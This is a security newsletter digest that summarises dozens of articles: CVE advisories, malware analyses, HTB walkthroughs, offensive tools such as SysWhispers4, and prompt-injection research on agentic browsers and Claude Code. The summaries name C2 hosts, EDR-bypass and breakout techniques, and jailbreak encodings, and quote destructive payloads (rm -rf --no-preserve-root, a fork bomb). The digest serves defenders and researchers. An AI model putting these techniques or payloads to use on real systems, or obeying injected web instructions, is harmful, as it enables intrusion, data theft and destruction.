Rapid7 details CVE-2026-2329 (CVSSv4 9.3): an unauthenticated stack buffer overflow in Grandstream GXP1600 VoIP phones’ HTTP API on TCP/80. The endpoint /cgi-bin/api.values.get parses POST request as colon-delimited identifiers into char small_buffer[64] without bounds checks, enabling PC control and root RCE. NX forces ROP; no canary and no PIE help. A multi-token trick places multiple NUL bytes for addresses. Fixed in firmware 1.0.7.81.

📱 Mobile | 🧬 Malware | 🧩 Supply Chain | 💣 RCE

🔗 Original article: https://securelist.com/keenadu-android-backdoor/118913/

Keenadu is a firmware supply-chain Android backdoor embedded into libandroid_runtime.so by patching android.util.Log.println_native. The native dropper RC4-decrypts an embedded blob, writes it to /data/dalvik-cache/.../vndx_10x.jar@classes.jar, and runs it via DexClassLoader (com.ak.test.Main). It splits into AKServer (in system_server) and AKClient (all apps) using binder/protected broadcasts to load per-app modules and even grant/revoke arbitrary permissions. C2 uses Base64→gzip→AES-128-CFB with MD5-derived keys; modules are MD5-checked, DSA-signed, and AES-CFB-decrypted from a custom container. Modules include Chrome omnibox exfiltration/search hijack, clickers, install fraud, and spyware.

📱 Android | 🤖 GenAI | 🛡️ Malware | 🕹️ RAT

🔗 Original article: https://www.welivesecurity.com/en/eset-research/promptspy-ushers-in-era-android-threats-using-genai/

ESET reports PromptSpy, a multistage Android malware (dropper + payload) that deploys a VNC remote-access module and abuses Accessibility. Its novel feature uses Google Gemini for persistence: the malware sends an Accessibility-derived UI XML dump (with bounds) and receives strict JSON actions (CLICK/LONG_CLICK/SWIPE with coordinates) to lock itself in Recent Apps. C2 uses VNC to 54.67.2[.]84 with AES encryption; it captures lockscreen data, screenshots/video, and blocks uninstall via invisible overlay rectangles.

🛠️ Tool | 📱 Android | 🧬 Frida | 🔍 Detection

🔗 Original article: https://github.com/arvinjangid/MythDetector

MythDetector is an Android 7.0+ defensive app that detects Frida instrumentation using 12 heuristic checks (e.g., memory maps analysis, scanning Frida ports 27042/27043, thread inspection, TracerPid (/proc/<pid>/status), filesystem/env/process/network checks, debugger/emulator detection, integrity verification, and Frida Gadget detection). It requires root for 9/12 methods and reports results as ✅/⚠️/❌ with a 🔓 icon when root was used. APK v1.0.0 is published via GitHub releases.

🪟 Windows | 🛠️ Tool | 💣 RCE | 🎁 PoC

🔗 Original article: https://trustedsec.com/blog/notepad-plugins-plug-and-payload

TrustedSec explains how Notepad++ plugins (DLLs in the plugins folder) are auto-loaded at startup and can be abused for in-process code execution and persistence. It provides a simple C plugin (MyNewPlugin) that adds a menu item and shows a MessageBox with the Notepad++ PID/process name, then a weaponized LoadDLL plugin that reflectively loads DLLs from a file or URL and can invoke exports. Links to GitLab code are included.

🛡️ CVE | ⬆️ Privesc | 🧩 Plugin | 🧠 ML

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-26-116/

ZDI-26-116 / CVE-2026-2492 is a TensorFlow local privilege escalation due to uncontrolled search path in HDF5 plugin loading. A low-privileged attacker can drop a malicious HDF5 plugin into an unsecured plugin location; when a target user runs TensorFlow and plugin loading occurs, the attacker’s plugin executes as that user. CVSS 7.0 (AV:L/AC:H/PR:L). Fixed via TensorFlow update (commit 46e7f7f...).

🛡️ CVE | 🪟 Windows | ⬆️ LPE | 🧩 DLL Hijack

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-26-122/

ZDI-26-122 covers CVE-2026-2040 (CVSS 7.3) in PDF-XChange Editor’s TrackerUpdate updater. TrackerUpdate loads a DLL from an unsecured location (Uncontrolled Search Path Element), enabling DLL hijacking. A local attacker with low-privileged code execution can place a malicious DLL in a searched/writable directory and trigger TrackerUpdate (UI required) to execute attacker code in the target user context, achieving LPE. Fixed in 10.7.3.401.

📱 Mobile | 🦠 Malware | 🕹️ Device Takeover | 🪟 Overlay

🔗 Original article: https://www.threatfabric.com/blogs/massiv-when-your-iptv-app-terminates-your-savings

ThreatFabric profiles “Massiv,” a new Android banking/Device Takeover malware spread via side-loaded IPTV-lure droppers. It steals credentials via overlays and keylogging, intercepts SMS/Push, and enables operator-driven remote control using AccessibilityService over a WebSocket C2. Remote sessions support MediaProjection screen streaming plus a UI-tree JSON mode that walks AccessibilityWindowInfo/AccessibilityNodeInfo to bypass screenshot protections. Appendix includes many bot commands (click/swipe, blackscreen, installApk, permission-request screens) and SHA-256/package IOCs.

🛡️ CVE | 💣 RCE | 🪟 Windows | 🎁 PoC

🔗 Original article: https://www.thezdi.com/blog/2026/2/19/cve-2026-20841-arbitrary-code-execution-in-the-windows-notepad

CVE-2026-20841 is an arbitrary code execution bug in modern Windows Notepad’s Markdown link handling. Only .md triggers Markdown rendering (sub_1400ED5D0()); clicking a link is handled by sub_140170F60(), which insufficiently filters the URI then calls ShellExecuteExW(). Crafted file:// or ms-appinstaller:// links can invoke protocol handlers to execute/open attacker-controlled content as the victim user (open + click required). Patched Feb 2026; GitHub PoC available; ZDI provides regex-based network/content detections for .md deliveries.

🛠️ Tool | 🌐 Web | 🧑‍💻 Social Engineering | 💉 Stealer

🔗 Original article: https://redcanary.com/blog/threat-intelligence/intelligence-insights-february-2026/

Red Canary’s “Intelligence Insights: February 2026” (Jan 2026 telemetry) highlights heavy abuse of ScreenConnect and NetSupport Manager plus ClearFake and PS1Bot. ClearFake compromises (often WordPress) sites with injected JavaScript, uses fake CAPTCHA/ClickFix “paste-and-run,” and executes LOLBAS/PowerShell cradles (e.g., WScript + SyncAppvPublishingServer.vbs; IEX+IRM; WinHttp COM → %TEMP%\FVL.ps1 with -ep bypass) to deliver stealers (Amadey, ArechClientC2, LummaC2). PS1Bot spreads via SEO-poisoned ZIPs containing FULL DOCUMENT.js run by wscript.exe, installs to random ProgramData paths, and runs .NET-backed PowerShell modules (keylogging, screenshots, info theft), sometimes preceding Rhadamanthys.

🛡️ CVE | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: https://unit42.paloaltonetworks.com/beyondtrust-cve-2026-1731/

Unit 42 reports active exploitation of BeyondTrust CVE-2026-1731 (CWE-78, CVSSv4 9.9): a pre-auth WebSocket RCE in thin-scc-wrapper. The WebSocket handshake parses remoteVersion and compares it in bash arithmetic ((( ))/let), allowing $(cmd) expansion (PoC-like a[$(cmd)]0) to execute OS commands as the site user. Post-exploit activity includes DB hash swapping for admin (User ID 1), PHP webshells (guarded eval()), Apache config STOMPing, SparkRAT/VShell, DNS OAST via oastify[.]com, and XDR XQL detection queries.

🧠 Prompt Injection | 🔓 Data Exfiltration | 🌐 Web | 🎁 PoC

🔗 Original article: https://blog.trailofbits.com/2026/02/20/using-threat-modeling-and-prompt-injection-to-audit-comet/

Trail of Bits audited Perplexity’s Comet agentic browser (April 2025) using the TRAIL threat model and prompt-injection red teaming. They built PoCs showing attacker-controlled webpages can trick the sidebar AI assistant into following on-page “summarization”/fake system/user/security instructions, navigating via redirects into Gmail (using the victim’s logged-in session), copying email content, URL-encoding it, and sending it to attacker endpoints (e.g., fragment “combine” or “validator”). No CVE; high-impact confused-deputy data exfiltration.

🛡️ Active Directory | 🕵️ Evasion | ☁️ Entra ID | 🧩 GPO

🔗 Original article: https://www.tenable.com/blog/active-directory-dynamic-objects-stealthy-threat

Tenable (Feb 20, 2026) shows how AD dynamic objects (aux class dynamicObject) self-delete via GC when entryTTL/msDS-Entry-Time-To-Die expires, leaving no tombstone. Attackers can use this for stealth: dynamic MAQ machine accounts (PowerMad objectClass tweak), PGID “invisible” membership corruption, AdminSDHolder/SDProp ACL pollution with orphan SIDs, dynamic GPO execution via gPCFileSysPath SMB spoofing + orphaned gPLink, ephemeral AD-integrated dnsNode records, and Entra Connect delta-sync deletion gaps that leave orphan cloud users. Defend with real-time TTL monitoring; set MAQ to 0.

🛡️ CVE | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: https://0xdf.gitlab.io/2026/02/21/htb-giveback.html

Walkthrough of HTB Giveback: enumerate ports 22/80/30686, identify WordPress 6.8.1 with GiveWP 3.14.0, then exploit CVE-2024-5932 (unauth PHP object injection via give_title + POP chain to shell_exec) using the EQSTLab PoC (run with uv) to pop a bash TCP reverse shell caught by nc. Inside the K8s WordPress pod, dump /secrets (plaintext creds), env (service map + K8s API), access MariaDB, extract wp_users, and probe an internal legacy CGI/PHP-CGI CMS via php file_get_contents.

📱 Android | 🦠 Malware | 🕵️ RAT | 🧠 AI

🔗 Original article: https://cyble.com/blog/surxrat-downloads-large-llm-module-from-hugging-face/

SURXRAT V5 is an Android MaaS RAT sold via Telegram with reseller/partner tiers. It abuses dangerous permissions plus Accessibility, registers victims using a random UUID, and uses Firebase RTDB C2 (hxxps://xrat-sisuriya-default-rtdb.firebaseio[.]com; “arsinkRAT” reference) for near-real-time commands and exfiltration (SMS, contacts, calls, accounts, notifications, clipboard, files, etc.). It includes a ransomware-style screen locker with remote PIN/message and reports wrong PIN attempts. New samples conditionally download a >23GB Hugging Face LLM module when specific Free Fire packages run, likely for lag manipulation, masking activity, or future AI features.

🪟 Windows | 🧩 AD | 💣 RCE | 🛡️ Vuln

🔗 Original article: https://0xdf.gitlab.io/2026/02/24/htb-bruno.html

HTB Bruno (Windows Server 2022 DC, bruno.vl): Anonymous FTP exposes a .NET Core 3.1 “SampleScanner” that extracts ZIPs insecurely: Path.Combine("C:\\samples\\queue\\", entry.FullName) + ExtractToFile() enables ZipSlip. With svc_scan creds (AS-REP roast + hashcat → Sunshine1), write to SMB share queue and upload a crafted ZIP to write into ..\app\. Use ProcMon (NAME NOT FOUND *.dll) to identify a DLL hijack target, drop a malicious DLL via ZipSlip, and get RCE when the scheduled scanner runs. Privesc noted: LDAP signing disabled → Kerberos relay → RBCD → impersonate Administrator.

🌐 Web | 🔑 OAuth | 🎣 Phishing | 🛠️ Tool

🔗 Original article: https://redcanary.com/blog/threat-detection/entra-id-oauth-attacks/

Red Canary shows how Entra ID OAuth consent can be abused to gain persistent delegated access (e.g., Mail.Read offline_access). It explains how to investigate by correlating AuditLogs events (Consent to application + Add service principal) via CorrelationId, verify third-party ownership with AppOwnerOrganizationId, and identify non-admin consents (IsAdminConsent=False). Includes copy/paste remediation with Graph PowerShell: Remove-MgBetaOAuth2PermissionGrant (revoke grant) and Remove-MgServicePrincipal (remove app).

Supply Chain | Tool | RCE | Malware

🔗 Original article: https://www.tenable.com/blog/cybersecurity-research-faq-new-malicious-npm-package-ambar-src

Tenable analyzed the malicious npm typosquat "ambar-src" (~50k downloads). Installing it triggers a "preinstall" script (no import required) that runs hex-encoded OS-specific commands to fetch/execute malware stages from x-ya[.]ru. Windows drops msinit.exe that decrypts and runs shellcode in memory; Linux runs a bash dropper that deploys an ELF payload (osa) and a Go reverse_ssh client; macOS uses nohup and osascript to run a Mythic Apfell agent. C2 uses Yandex Cloud Functions endpoints (MITRE T1102). Treat any host with ambar-src as compromised; rotate secrets from a clean machine.

🧬 Malware | ⛓️ Supply Chain | 🛠️ Tool | 🌐 Web

🔗 Original article: https://www.tenable.com/blog/cybersecurity-research-faq-new-malicious-npm-package-ambar-src

Tenable analyzed the malicious npm package ambar-src (~50k downloads) that compromises hosts at install time via an npm preinstall hook. npm install ambar-src runs index.js, which decodes hex-encoded OS-specific one-liners to pull stage-2 from x-ya[.]ru. Windows drops msinit.exe (decrypts/executes shellcode in memory), Linux drops/executes an ELF osa (incl. NHAS/reverse_ssh), and macOS runs Mythic Apfell JS via osascript using nohup. Post-infection C2 relays via Yandex Cloud Functions (MITRE T1102). Treat any host with the package as fully compromised and rotate secrets.

🛠️ Tool | 🐧 Linux | 🧠 Forensics | 📦 BPF

🔗 Original article: https://blog.trailofbits.com/2026/02/25/mquire-linux-memory-forensics-without-external-dependencies/

Trail of Bits open-sources mquire, a Linux memory forensics tool that analyzes kernel memory dumps without external debug symbols. It extracts type layouts from BTF and symbol addresses from Kallsyms by scanning the dump, then exposes artifacts (tasks, mappings, open files, modules, network, dmesg, cached syslog) through an osquery-like SQL interface. It also supports extracting cached files via .dump. No CVEs; defensive/IR tool.

🛡️ CVE | 💣 RCE | 🧨 Command Injection | 🌐 Network

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-26-124/

CVE-2025-15060 (ZDI-26-124): claude-hovercraft’s executeClaudeCode uses a user-supplied string in a system call without proper validation, enabling unauthenticated remote command injection and RCE (CVSS 9.8: AV:N/AC:L/PR:N/UI:N). Exploitation executes code as the service account. Advisory notes the upstream repo was removed, so defenders should check for forks/copies and mitigate locally.

📱 iOS | 🧬 Malware | 🪝 Hooking | 🕵️ Spyware

🔗 Original article: https://www.jamf.com/blog/predator-spyware-ios-recording-indicator-bypass-analysis/

Jamf reverse-engineers Predator iOS spyware’s post-compromise bypass of iOS 14+ camera/mic dots. HiddenDot hooks SpringBoard’s SBSensorActivityDataProvider._handleNewDomainData: and zeros ARM64 x0 (Objective‑C self) so the call becomes [nil _handleNewDomainData:] (nil messaging), dropping sensor updates. DMHooker is Mach exception-based; return 2 resumes with modified thread state. VoIP hooks AudioConverterNew and AudioConverterConvertComplexBuffer+52, converts float32→int16 with NEON, downmixes 4ch→stereo, writes via ExtAudioFileWrite(). CameraEnabler uses memmem() pattern matching and PAC-aware redirect (return 3).

🛡️ CVE | 💣 RCE | 🔑 Secrets | 🎁 PoC

🔗 Original article: https://research.checkpoint.com/2026/rce-and-api-token-exfiltration-through-claude-code-project-files-cve-2025-59536/

Check Point found critical supply-chain flaws in Anthropic Claude Code where repo-controlled configs trigger execution/networking. (1) Hooks in .claude/settings.json run shell commands on lifecycle events without per-command approval → RCE (demo: open -na Calculator, escalated to reverse shell). (2) CVE-2025-59536: repo-set enableAllProjectMcpServers/enabledMcpjsonServers auto-approves .mcp.json, executing init commands before consent → RCE. (3) CVE-2026-21852: malicious ANTHROPIC_BASE_URL exfiltrates API key before trust; stolen keys can access Workspaces and bypass “non-downloadable” by regenerating files via code execution.

CVE | Windows | LPE | PoC

🔗 Original article: https://projectzero.google/2026/02/gphfh-deep-dive.html

Project Zero reverse-engineers Windows GetProcessHandleFromHwnd from Vista’s hook + shared-memory handle return to Windows 10 1803+ Win32k NtUserGetWindowProcessHandle. The kernel version opened processes via ObOpenObjectByPointer(..., KernelMode), bypassing user-mode access checks and enabling attacks on sandboxes and especially Protected Processes/PPL (CVE-2023-41772 fixed the UIAccess shortcut). Windows 11 24H2 adds UIPIAlwaysOn/protection-level checks and a feature-flagged safer path. Exploit steps and a public PoC (PPLwindow) are referenced.

🛠️ Tool | 📱 Android | 🔎 IOC | 🧪 Malware

🔗 Original article: https://github.com/drego85/artifacts

artifacts is a Python 3.10+ CLI for fast static triage of suspicious Android APKs. It uses apkInspector to extract even malformed/obfuscated APK ZIPs and decode binary AndroidManifest.xml, then hunts IOCs (Base64 blobs, URLs/IPs, Telegram artifacts) and matches manifest-derived indicators (permission/application/intent) to families in data/patterns.json via per-bucket Jaccard similarity and an averaged final score. Outputs JSON reports (-r), similarity tables (-s), and manifest dumps (--activity).

🛠️ Tool | 📱 Mobile | 🍏 iOS | 🔧 RE

🔗 Original article: https://github.com/Saurabh221662/GadgetInjector

Gadgetinjector is a Python tool that injects Frida Gadget into iOS 17/18 IPAs via Mach-O @rpath loading so the app auto-loads FridaGadget.dylib and is Objection listen-mode ready. It detects the local Frida version, downloads a matching gadget, checks arm64/arm64e, and outputs MyApp-frida-listen.ipa. After injection you must re-sign (same Team ID for dylibs; no entitlements on FridaGadget.dylib), optionally launch paused with xcrun devicectl, forward 27042 via pymobiledevice3, then attach with Objection or Frida CLI.

🛠️ Tool | 🛡️ CVE | 💣 RCE | 📡 IoT

🔗 Original article: https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-02-27-2026

Rapid7’s Feb 27, 2026 Metasploit wrap-up adds major modules: Ollama path traversal (CVE-2024-37032) enabling arbitrary file write and chaining to unauth root RCE via malicious .so + forced process spawn; BeyondTrust PRA/RS unauth command injection RCE (CVE-2026-1731) with new helper library and improved version checking; and Grandstream GXP1600 unauth root RCE via stack overflow (CVE-2026-2329) plus credential-stealing and SIP capture post modules. Also adds ARM64 RC4 in-memory ELF packer with sleep evasion and new Windows persistence techniques. Update with msfupdate.

🌐 Web | 🧷 IDOR | 🛠️ Tool | 💉 XSS

🔗 Original article: https://0xdf.gitlab.io/2026/02/28/htb-guardian.html

Recon finds SSH(22) and Apache(80) redirecting to guardian.htb. Host-header fuzzing with ffuf discovers portal.guardian.htb. A help PDF (/static/downloads/Guardian_University_Student_Portal_Guide.pdf) leaks default password GU1234 (metadata shows python-docx / Word 2016). Using structured IDs (GU + 3 digits + year), ffuf brute forces logins via process substitution and markers, confirming GU0142023. An IDOR in /student/chat.php?chat_users[0]=X&chat_users[1]=Y lets any authenticated user read other users’ chats; ffuf+cookie enumerates non-empty chats and jq deduplicates symmetric pairs. Intro states later XSS/CSRF/LFI→RCE and privesc steps.

🛠️ Tool | 📱 Android | 🧰 Debugging | 🌐 Web

🔗 Original article: https://github.com/ProxymanApp/atlantis-android

Atlantis Android is a Proxyman companion library for capturing Android app HTTP/HTTPS (and optionally WebSocket) traffic without configuring a device proxy or installing CA certs. It works by instrumenting OkHttp with Atlantis.getInterceptor() and wrapping WebSocketListener via Atlantis.wrapWebSocketListener(...), then discovers Proxyman using NSD/mDNS and forwards data (optionally GZIP’d) over TCP. Major risk: if shipped enabled in production, it can exfiltrate sensitive plaintext network payloads.

🛠️ Tool | 🍎 iOS | 🔓 Jailbreak | 🧰 DevOps

🔗 Original article: https://github.com/34306/vphone-aio

Repo with a single script (vphone-aio.sh) that assembles split .tar.zst parts into a prebuilt vphone environment for iOS 26.1 (already jailbroken + bootstrap). Requires brew install git-lfs, disabling macOS SIP, and setting amfi_get_out_of_my_way=1. Downloads ~12GB, recommends >128GB free, merges then extracts (~15 min), and exposes UI via VNC: vnc://127.0.0.1:5901. No CVEs/PoCs are documented.

🛠️ Tool | 🌐 Web | 💰 Bug Bounty | ⛓️ Multi-step

🔗 Original article: https://bountysecurity.ai/blogs/news/new-burp-bounty-pro-v3-0-0-release

Burp Bounty Pro v3.0.0 (Burp Suite Pro + Java 14+) is a rebuilt scanning extension adding multi-step request chains with cookie reuse (e.g., Auth_Bypass_MultiStep: match Set-Cookie: session= then request /admin/dashboard and grep Welcome, Admin), native timing-based detection (Between/Greater/Less; baseline + SLEEP(5)), global variables ({BC}, {RANDOM}, {CURRENT_HOST}…), and per-scan performance controls. It also adds true pause/resume (PausableThreadPoolExecutor) and multiple noise/traffic reductions.

🛠️ Tool | 🌐 Web | 📱 Mobile | 🧩 Protobuf

🔗 Original article: https://www.synacktiv.com/publications/mitmproxy-for-fun-and-profit-interception-et-analyse-de-flux-applicatifs.html

Technical guide to using mitmproxy for MITM interception/modification across Linux, Android, and iOS. It builds a Linux lab with network namespaces, a Wi‑Fi AP via lnxrouter, and nftables transparent redirection. Demos: (1) Git smart-HTTP path rewriting to clone a different GitHub repo while the remote URL looks unchanged, (2) Android gRPC/protobuf parsing and coordinate rewriting after promoting the mitmproxy CA to a system CA via Magisk + Cert-Fixer, and (3) iOS Mumble reverse TLS MITM with TCP buffering and protobuf decoding to dump messages.

🪟 Windows | 🧩 Misconfig | 🧷 Sandbox Escape | 🧗 Privesc

🔗 Original article: https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/

A technical playbook for escaping locked-down Citrix/RDP/kiosk Windows sessions via misconfigurations. It shows how to pivot from Open/Save/Print dialogs into filesystem access (env vars, shell: paths, protocol handlers, UNC paths), gain shells (Win+R, browsing to System32, drag-drop onto cmd.exe), and bypass blocked cmd with Task Scheduler (at.exe/taskschd.msc). It covers writable-path discovery (%TEMP%, AccessChk), weak allowlist bypasses (rename/copy into allowed dirs), Edge breakout surfaces, credential hunting (files/registry/GPP cPassword), and privesc via modifiable SYSTEM services and DLL hijacking.

🛠️ Tool | 📱 Mobile | 🧬 RE | 🧪 Frida

🔗 Original article: https://github.com/TheQmaks/areclaw

areclaw is a Windows-first Android reverse-engineering workspace that automates static/dynamic app security analysis. It installs common RE tools (jadx, apktool, Ghidra, radare2, deobfuscators, trufflehog) plus 21 pip packages (frida-tools, objection, mitmproxy, androguard, unicorn, triton, etc.). It ships 15 Frida scripts for SSL pinning bypass, root/anti-Frida bypass, HTTP/API/crypto tracing, and runtime DEX/SO load dumping, and integrates a Claude Code agent for guided workflows.

🛡️ CVE | 🌐 Web | 🔑 SSO/SAML | 🎁 PoC

🔗 Original article: https://0xdf.gitlab.io/2026/03/03/htb-barrier.html

Barrier (HTB Linux): get GitLab creds from Git history, capture an Authentik-signed SAMLResponse, then exploit CVE-2024-45409 (Ruby-SAML signature verification bypass) using Synacktiv’s PoC to forge a SAML assertion and log in as GitLab admin (akadmin). As admin, extract AUTHENTIK_TOKEN from GitLab CI/CD variables and use it to access Authentik admin API endpoints to confirm version (2024.10.5) and enumerate apps/users (GitLab + Guacamole).

🌐 Web | 🤖 AI | 🧬 Prompt Injection | 💥 DoS

🔗 Original article: https://unit42.paloaltonetworks.com/ai-agent-prompt-injection/

Unit 42 (Mar 3, 2026) reports real-world web-based Indirect Prompt Injection (IDPI): hidden instructions embedded in webpages are ingested by LLM tools/AI agents and can be treated as commands. The post details delivery (CSS/DOM hiding, SVG CDATA, data-* attributes, runtime Base64 decode, delays, canvas/OCR risk, URL fragments) and jailbreaks (zero-width chars, homoglyphs, U+202E, entity/URL/Base64 + nested encoding, JSON breakouts, multilingual + social engineering). In-the-wild cases include ad-review bypass attempts, SEO poisoning, forced Stripe/OAuth transactions, sensitive/system prompt leakage, and destructive DoS payloads like rm -rf --no-preserve-root and fork bomb :(){ :|:& };:.

🧬 Malware | 🪟 Windows | 💣 RCE | 🛠️ Tool

🔗 Original article: https://research.checkpoint.com/2026/silver-dragon-targets-organizations-in-southeast-asia-and-europe/

Silver Dragon (likely APT41) compromises Windows environments via server exploitation and phishing, then persists by hijacking .NET AppDomain execution (dfsvc.exe.config) and/or svchost ServiceDll services. MonikerLoader decrypts (ADD-XOR) and reflectively loads stage2, which allocates RWX memory and runs Cobalt Strike shellcode. BamboLoader RC4-decrypts, LZNT1-decompresses (RtlDecompressBuffer) and injects into child processes (e.g., taskhostw.exe), adding a single-byte XOR layer. Post-exploitation includes GearDoor (Google Drive DES-encrypted C2), SilverScreen (screenshots), and SSHcmd (Renci.SshNet).

🛠️ Tool | 📱 Android | 🧬 Frida | 🛡️ Bypass

🔗 Original article: https://github.com/ommirkute/Auto-Frida

Auto Frida v2.0 is a Frida-based Android security testing automation toolkit. It validates the host environment, detects devices via ADB, provisions Frida server using 3-layer validation (process + port 27042 + frida-ps handshake), enumerates apps, and uses Auto Analyzer v2 (spawn-mode + weighted classification) to detect protections and auto-generate a hook-once consolidated bypass script. It includes modules for SSL pinning, root/emulator/ADB detection, anti-debug/anti-Frida, kill-switches, dynamic DEX loading, biometric gates, and supports Frida CodeShare.

🌐 Web | 🛠️ Tool | 🎣 Phishing | 🔑 OAuth

🔗 Original article: https://redcanary.com/blog/threat-detection/google-workspace-oauth-attack/

Red Canary details a Google Workspace OAuth consent (consent phishing) attack where a victim authorizes a malicious OAuth app (“Privacy Policy Extension”) requesting https://www.googleapis.com/auth/chromewebstore. That scope can let attackers edit/publish Chrome Web Store extensions, enabling supply-chain delivery of malicious updates that steal cookies/tokens (e.g., for Facebook Ads takeover). The post includes a full Admin Reports token/authorize JSON example, recommends baselining OAuth grants with gam all users print tokens todrive, detecting new client IDs + risky/rare scopes, and responding by revoking tokens (gam all users delete tokens clientId ...) and blocking the client ID.

📱 Mobile | 🕵️ Spyware | 🎭 Evasion | 🌐 C2

🔗 Original article: https://www.cloudsek.com/blog/redalert-trojan-campaign-fake-emergency-alert-app-spread-via-sms-spoofing-israeli-home-front-command

CloudSEK reports a smishing-driven Android trojan (“RedAlert.apk”, package com.red.alertx) spread via spoofed/urgent SMS to force sideloading. The Stage-1 loader hooks ActivityThread.sPackageManager with Proxy.newProxyInstance to spoof getPackageInfo signing certs (hardcoded Base64 X.509; header AQAAAr8, 1 cert, 703 bytes) and fake installer source (getInstallerPackageName → com.android.vending). attachBaseContext drops asset umgdn, rewrites ApplicationInfo sourceDir/publicSourceDir, and loads multi-stage DEX (Stage 3: DebugProbesKt.dex). It polls permissions, steals SMS/contacts/GPS, stages to local files, and exfiltrates via HTTP POST to api[.]ra-backup[.]com/analytics/submit.php.

🛠️ Tool | 🧬 Fuzzing | 💥 Crash | 🌐 Web

🔗 Original article: https://projectzero.google/2026/03/mutational-grammar-fuzzing.html

Explains two pitfalls of coverage-guided mutational grammar fuzzing: coverage doesn’t capture semantic/dataflow chains (e.g., libxslt needs document() output fed into generate-id()), and greedy corpus growth yields very similar samples. Proposes a practical Jackalope workflow: run a persistent server, repeatedly start fresh workers from an empty corpus for T seconds, sync with server, run another T seconds, sync, kill worker, repeat. Includes exact server command, Python loop, key flags, and libxslt/libxml2 commit experiment showing more/faster unique crashes.

🛠️ Tool | 🌐 Web | 💰 Bug Bounty | 🔎 Recon

🔗 Original article: https://github.com/panchocosil/burp-js-linkfinder-enhanced

BurpJSLinkFinder Enhanced is a Burp Suite Pro (Jython) extension that passively scans JavaScript responses to extract endpoints/URLs and detect embedded secrets (JWT, OAuth/Bearer, AWS keys, DB strings, private keys, GitHub/Stripe keys, passwords, credentialed URLs, emails). It detects JS by MIME type and /js paths, supports template literals and .ashx/extensionless handlers, filters false positives, and creates Burp Issues with severities. Install via Jython standalone JAR and load FransLinkfinder.py.

🧬 Malware | 🪟 Windows | 🐧 Linux | 🛠️ Tool

🔗 Original article: https://unit42.paloaltonetworks.com/cl-unk-1068-targets-critical-sectors/

Unit 42 profiles CL-UNK-1068 (active since 2020) targeting critical sectors in Asia using web shells (GodZilla/AntSword), IIS config/code theft, and a “print-exfiltration” trick (RAR + certutil -encode + type). Post-exploitation includes credential theft (Mimikatz, LsaRecorder hooking LsaApLogonUserEx2, DumpIt+Volatility modules, SSMS sqlstudio.bin dumper), and persistence/pivoting via custom FRP (token frpforzhangwei, shared password f*ckroot123) plus Xnote on Linux. They also use legit python.exe/pythonw.exe for DLL side-loading (python20.dll) to run in-memory payloads (FRP/PrintSpoofer/ScanPortPlus).

🛠️ Tool | 🪪 AD | 🧩 Kerberos | 📡 LDAP

🔗 Original article: https://github.com/Macmod/sopa

sopa is a Go ADWS client (MS-NNS + MC-NMF + SOAP) that performs AD enumeration and management over web services: LDAP-filter searches via WS-Enumeration (Enumerate/Pull), object Get/Create/Delete via WS-Transfer, attribute edits via Put, and password ops via MS-ADCAP. It supports an interactive shell, DC auto-discovery via SRV records, PTR lookups for Kerberos when targeting DCs by IP, and authentication using password, NT hash, Kerberos AES key/ccache, or PKINIT certs.

🛡️ CVE | 💣 RCE | 🧠 Memory Corruption | 🗜️ Media Parser

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-26-163/

ZDI-26-163 (Mar 6, 2026) covers CVE-2026-3082: a heap-based buffer overflow in GStreamer’s JPEG parser while processing JPEG Huffman tables. Missing validation of attacker-controlled table length before copying into a fixed-size heap buffer enables heap corruption and potential RCE in the parsing process (vector depends on the app embedding GStreamer; UI/library interaction required). Fixed by commit 7d3c258ed928cf59d126c8ea926b185f046f444c.

🛡️ CVE | 💣 RCE | 🛠️ Tool | 🫥 Evasion

🔗 Original article: https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-06-2026

Rapid7’s “Metasploit Wrap-Up 03/06/2026” (Framework 6.4.116→6.4.119) focuses on payload reliability: operators can now select encoders and tweak encoder options at runtime without module glue code. New modules include a Linux x86 RC4 packer evasion stub (RC4-encrypt payload, optional nanosleep delay, runtime decrypt + in-memory exec), an authenticated Tactical RMM Jinja2 SSTI RCE for CVE-2025-69516 (<1.4.0) using Knox API login and /env-config.js discovery, and unauthenticated MajorDoMo command injection/RCE modules tied to a cycle_execs race (CVE-2026-27175).

🛡️ CVE | 🐧 Linux | ⬆️ Privesc | 🎁 PoC

🔗 Original article: https://0xdf.gitlab.io/2026/03/07/htb-expressway.html

Expressway (HTB Linux): enumerate IKE on UDP/500 with ike-scan Aggressive Mode to leak ID (ike@expressway.htb) and capture an IKE-PSK SHA1 handshake, crack it with hashcat (mode 5400) to recover the PSK, then reuse it for SSH. Priv-esc is shown via sudo CVE-2025-32463 (sudo --chroot reads attacker nsswitch.conf and loads malicious libnss_*.so.2 as root) and intended CVE-2025-32462 (sudo -h hostname spoofing bypasses host-based sudoers rules). Includes strongSwan IPsec config/commands.

🛠️ Tool | 🪟 Windows | 🕵️ EDR | 💣 RCE

🔗 Original article: https://github.com/JoasASantos/SysWhispers4

SysWhispers4 (Python 3.10+) generates C/ASM syscall stubs to bypass user-mode AV/EDR inline hooks on ntdll.dll across Windows NT 3.1 → Windows 11 24H2 (x64/x86/WoW64/ARM64). It includes 8 SSN resolution strategies (Static, Hell/Halo/Tartarus’ Gate, FreshyCalls, SyscallsFromDisk, RecycledGate, HW breakpoint+VEH), 4 invocation modes (embedded/indirect/randomized/egg hunt), plus evasions like ETW+AMSI patching, ntdll unhooking, anti-debug checks, and Ekko-style sleep XOR encryption of .text.

🛠️ Tool | 📱 Mobile | 🔍 Reverse Engineering | 🌐 Web

🔗 Original article: https://github.com/SimoneAvogadro/android-reverse-engineering-skill

Claude Code skill/plugin that automates Android reverse engineering for APK/XAPK/JAR/AAR to extract HTTP APIs (Retrofit, OkHttp, hardcoded URLs, auth headers/tokens) and trace call flows (Activity/Fragment → ViewModel → repository → HTTP). Uses jadx by default and can compare Fernflower/Vineflower outputs. Includes install commands, /decompile, and standalone scripts (check-deps, install-dep, decompile, find-api-calls). No CVEs or direct exploit PoCs—this is an API-extraction/reversing tool.

🛠️ Tool | 📱 Mobile | 🪝 Frida | 🌐 Network

🔗 Original article: https://github.com/ynsmroztas/AndroHunter

